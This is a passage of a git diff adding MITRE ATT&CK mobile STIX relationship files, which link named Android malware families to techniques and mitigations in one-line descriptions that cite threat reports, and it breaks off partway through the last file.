@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--8978ef50-9a97-40bc-b598-dc6fa590a4d3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e0121f6c-0312-4fff-9d6c-0a8aea945bea", + "created": "2023-02-06T19:45:58.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T22:08:45.192Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can use the open-source project RetroFit for C2 communication.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e245e45a-71a8-408d-8f32-7b7337bffc26.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e245e45a-71a8-408d-8f32-7b7337bffc26.json new file mode 100644 index 0000000000000000000000000000000000000000..2c76a67e6c56bf1d4bea0a3d4f925ab713c74f03 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e245e45a-71a8-408d-8f32-7b7337bffc26.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--f4343702-5b7d-4a1f-ab62-7ae81dfc3f50", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e245e45a-71a8-408d-8f32-7b7337bffc26", + "created": "2023-01-18T19:19:58.007Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:10:23.208Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can hide its application icon.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e457921c-4a0b-4d6e-92e7-553929ddf943.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e457921c-4a0b-4d6e-92e7-553929ddf943.json new file mode 100644 index 0000000000000000000000000000000000000000..6ac0b7d2975fbae394c72c66e363eb420487bec6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e457921c-4a0b-4d6e-92e7-553929ddf943.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--cf4566f9-d282-4d02-8f9b-f77dd5da048e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e457921c-4a0b-4d6e-92e7-553929ddf943", + "created": "2023-02-06T18:51:14.919Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:23:48.120Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can download and install additional malware after initial infection.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e7af5be1-721f-40c5-b647-659243a0a14b.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e7af5be1-721f-40c5-b647-659243a0a14b.json new file mode 100644 index 0000000000000000000000000000000000000000..e83625b890a38213c01fae75e05e22c6b4316088 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e7af5be1-721f-40c5-b647-659243a0a14b.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--98c7323b-08ee-4e09-9fee-4f42b1084270", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e7af5be1-721f-40c5-b647-659243a0a14b", + "type": "relationship", + "created": "2020-04-08T15:41:19.321Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2021-09-20T13:50:02.057Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can record phone calls and audio.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e99fd1c9-441f-41bc-83a1-e7bed8f2d7fb.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e99fd1c9-441f-41bc-83a1-e7bed8f2d7fb.json new file mode 100644 index 0000000000000000000000000000000000000000..f21b020931c7aa9830ec2493e5e05a0d7e4386fa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e99fd1c9-441f-41bc-83a1-e7bed8f2d7fb.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b8daa543-dd34-458a-8d00-616a43b4b6fb", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e99fd1c9-441f-41bc-83a1-e7bed8f2d7fb", + "type": "relationship", + "created": "2020-12-17T20:15:22.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.444Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can load additional Dalvik code while running.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eb6dbe2a-6f76-4bce-ab37-66ec67148041.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eb6dbe2a-6f76-4bce-ab37-66ec67148041.json new file mode 100644 index 0000000000000000000000000000000000000000..e552363428c4caad349f0e4e0b0c8c572ad05aed --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eb6dbe2a-6f76-4bce-ab37-66ec67148041.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--34b6435d-249c-4c39-b7b8-f4da6dab6c77", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eb6dbe2a-6f76-4bce-ab37-66ec67148041", + "type": "relationship", + "created": "2017-10-25T14:48:53.742Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-06-24T15:08:18.481Z", + "description": "Enterprise policies should prevent enabling USB debugging on Android devices unless specifically needed (e.g., if the device is used for application development).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eda3c5c4-d062-48d3-a78e-051f0c9d62f6.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eda3c5c4-d062-48d3-a78e-051f0c9d62f6.json new file mode 100644 index 0000000000000000000000000000000000000000..6167b21231b6c732fdbe8f635a4a590351cf2f76 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eda3c5c4-d062-48d3-a78e-051f0c9d62f6.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--f1e1fb3d-fed6-4e08-96a9-a123766619c4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--eda3c5c4-d062-48d3-a78e-051f0c9d62f6", + "created": "2023-02-28T20:31:55.191Z", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T20:31:55.191Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can access app notifications.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f012feab-5612-429f-81bd-ff75d6ffd04e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f012feab-5612-429f-81bd-ff75d6ffd04e.json new file mode 100644 index 0000000000000000000000000000000000000000..0a9640fe2d08cc014428a17bca47471cdc65d533 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f012feab-5612-429f-81bd-ff75d6ffd04e.json 
@@ -0,0 +1,26 @@
+{
+ "type": "bundle",
+ "id": "bundle--2410f5af-821c-4966-b2c8-6075cc670497",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--f012feab-5612-429f-81bd-ff75d6ffd04e",
+ "created": "2022-04-05T17:03:34.941Z",
+ "x_mitre_version": "0.1",
+ "x_mitre_deprecated": false,
+ "revoked": false,
+ "description": "",
+ "modified": "2022-04-05T17:03:34.941Z",
+ "relationship_type": "subtechnique-of",
+ "source_ref": "attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df",
+ "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f31490e8-ef81-40d5-bba9-24ca580d2ee6.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f31490e8-ef81-40d5-bba9-24ca580d2ee6.json
new file mode 100644
index 0000000000000000000000000000000000000000..25d279e6a926282b1a88f514ef482035620e773c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f31490e8-ef81-40d5-bba9-24ca580d2ee6.json
@@ -0,0 +1,33 @@
+{
+ "type": "bundle",
+ "id": "bundle--bc818c2f-5196-44b4-b1af-28fad93b7cb2",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "type": "relationship",
+ "id": "relationship--f31490e8-ef81-40d5-bba9-24ca580d2ee6",
+ "created": "2020-01-21T14:20:50.409Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "Bitdefender - Triout 2018",
+ "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout \u2013 Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020.",
+ "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-04-05T20:46:20.857Z",
+ "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) includes code to hide its icon, but the function does not appear to be called in an analyzed version of the software.(Citation: Bitdefender - Triout 2018)",
+ "relationship_type": "uses",
+ "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2",
+ "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f552ee2f-5e6a-47a1-b6a5-d5e5594feb0d.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f552ee2f-5e6a-47a1-b6a5-d5e5594feb0d.json
new file mode 100644
index 0000000000000000000000000000000000000000..9dfd23dd44c376fbded34c70e8058f2417c495b6
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f552ee2f-5e6a-47a1-b6a5-d5e5594feb0d.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--7dffae64-833d-4b3c-9ff1-816d2109e120",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--f552ee2f-5e6a-47a1-b6a5-d5e5594feb0d",
+ "type": "relationship",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf",
+ "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.",
+ "source_name": "Lookout-StealthMango"
+ }
+ ],
+ "modified": "2019-08-09T17:59:49.112Z",
+ "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads information about installed packages.(Citation: Lookout-StealthMango)",
+ "relationship_type": "uses",
+ "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c",
+ "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f65087b4-adf2-4292-a711-7ae829e91397.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f65087b4-adf2-4292-a711-7ae829e91397.json
new file mode 100644
index 0000000000000000000000000000000000000000..5cb20cbbdfe49429093388cb635590aacd18725d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f65087b4-adf2-4292-a711-7ae829e91397.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--65c397c3-a137-4ce4-8a3c-6617782778a7",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--f65087b4-adf2-4292-a711-7ae829e91397",
+ "type": "relationship",
+ "created": "2019-09-04T14:28:16.385Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.",
+ "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf",
+ "source_name": "Lookout-Monokle"
+ }
+ ],
+ "modified": "2019-09-04T14:32:12.877Z",
+ "description": "[Monokle](https://attack.mitre.org/software/S0407) can list applications installed on the device.(Citation: Lookout-Monokle)",
+ "relationship_type": "uses",
+ "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65",
+ "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f857935b-653a-4b9a-a2dc-59c042059a39.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f857935b-653a-4b9a-a2dc-59c042059a39.json
new file mode 100644
index 0000000000000000000000000000000000000000..a4d5a56becefa845b3ebf8eb7e42ec64e21ae33a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f857935b-653a-4b9a-a2dc-59c042059a39.json
@@ -0,0 +1,26 @@
+{
+ "type": "bundle",
+ "id": "bundle--fde8fc51-028c-40c7-aa6d-311ea515e146",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "type": "relationship",
+ "id": "relationship--f857935b-653a-4b9a-a2dc-59c042059a39",
+ "created": "2023-03-20T15:56:04.673Z",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-03-20T15:56:04.673Z",
+ "description": "",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0",
+ "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fa1da6db-da32-45d2-98a8-6bbe153166da.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fa1da6db-da32-45d2-98a8-6bbe153166da.json
new file mode 100644
index 0000000000000000000000000000000000000000..b74478938522012b39bd25bf1e6459b0f9173968
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fa1da6db-da32-45d2-98a8-6bbe153166da.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--2c234dd2-e508-4ce1-8e2b-855e32648b22",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--fa1da6db-da32-45d2-98a8-6bbe153166da",
+ "type": "relationship",
+ "created": "2017-12-14T16:46:06.044Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "Lookout-EnterpriseApps",
+ "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.",
+ "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/"
+ }
+ ],
+ "modified": "2018-10-17T00:14:20.652Z",
+ "description": "[AndroRAT](https://attack.mitre.org/software/S0292) tracks the device location.(Citation: Lookout-EnterpriseApps)",
+ "relationship_type": "uses",
+ "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93",
+ "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb62afa9-d593-44f8-840d-bd5c595a1228.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb62afa9-d593-44f8-840d-bd5c595a1228.json
new file mode 100644
index 0000000000000000000000000000000000000000..9f586ac8093d3e019e0cd17887b765135dba5de3
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb62afa9-d593-44f8-840d-bd5c595a1228.json
@@ -0,0 +1,26 @@
+{
+ "type": "bundle",
+ "id": "bundle--ab6e6b4c-3bdd-4945-b181-70711a89cdee",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--fb62afa9-d593-44f8-840d-bd5c595a1228",
+ "created": "2022-04-01T18:44:46.780Z",
+ "x_mitre_version": "0.1",
+ "x_mitre_deprecated": false,
+ "revoked": false,
+ "description": "An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features.",
+ "modified": "2022-04-01T18:44:46.780Z",
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee",
+ "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb6458b0-01b8-4c3f-b0f2-ef5d5bd9f6a8.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb6458b0-01b8-4c3f-b0f2-ef5d5bd9f6a8.json
new file mode 100644
index 0000000000000000000000000000000000000000..0dac61d5891cb8023ddc1a261b6a36b2b164ab23
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb6458b0-01b8-4c3f-b0f2-ef5d5bd9f6a8.json
@@ -0,0 +1,33 @@
+{
+ "type": "bundle",
+ "id": "bundle--623e7d7a-0e79-41f8-b623-2ad79dfbfb77",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "type": "relationship",
+ "id": "relationship--fb6458b0-01b8-4c3f-b0f2-ef5d5bd9f6a8",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "Lookout-StealthMango",
+ "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.",
+ "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-04-05T16:50:54.500Z",
+ "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads SMS messages.(Citation: Lookout-StealthMango)",
+ "relationship_type": "uses",
+ "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c",
+ "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fbdbddd7-4980-4061-9192-24a887bc6bad.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fbdbddd7-4980-4061-9192-24a887bc6bad.json
new file mode 100644
index 0000000000000000000000000000000000000000..768fcb499d8464e1f4e29f7677e75b53a166d5df
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fbdbddd7-4980-4061-9192-24a887bc6bad.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--d896f44d-f963-429e-844d-63f55e70367a",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--fbdbddd7-4980-4061-9192-24a887bc6bad",
+ "type": "relationship",
+ "created": "2020-12-07T14:28:32.141Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "Threat Fabric Exobot",
+ "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html",
+ "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020."
+ }
+ ],
+ "modified": "2020-12-07T14:28:32.141Z",
+ "description": "[Exobot](https://attack.mitre.org/software/S0522) can open a SOCKS proxy connection through the compromised device.(Citation: Threat Fabric Exobot)",
+ "relationship_type": "uses",
+ "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98",
+ "target_ref": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc22c1f0-6888-43c0-ac7e-ee3d21feafc4.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc22c1f0-6888-43c0-ac7e-ee3d21feafc4.json
new file mode 100644
index 0000000000000000000000000000000000000000..c52c6a382fde874331eda0f83a9b52fc22292944
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc22c1f0-6888-43c0-ac7e-ee3d21feafc4.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--66076b39-d882-4f6b-b30c-d8ea0c926789",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--fc22c1f0-6888-43c0-ac7e-ee3d21feafc4",
+ "type": "relationship",
+ "created": "2019-09-03T19:45:48.485Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "SWB Exodus March 2019",
+ "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html",
+ "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019."
+ }
+ ],
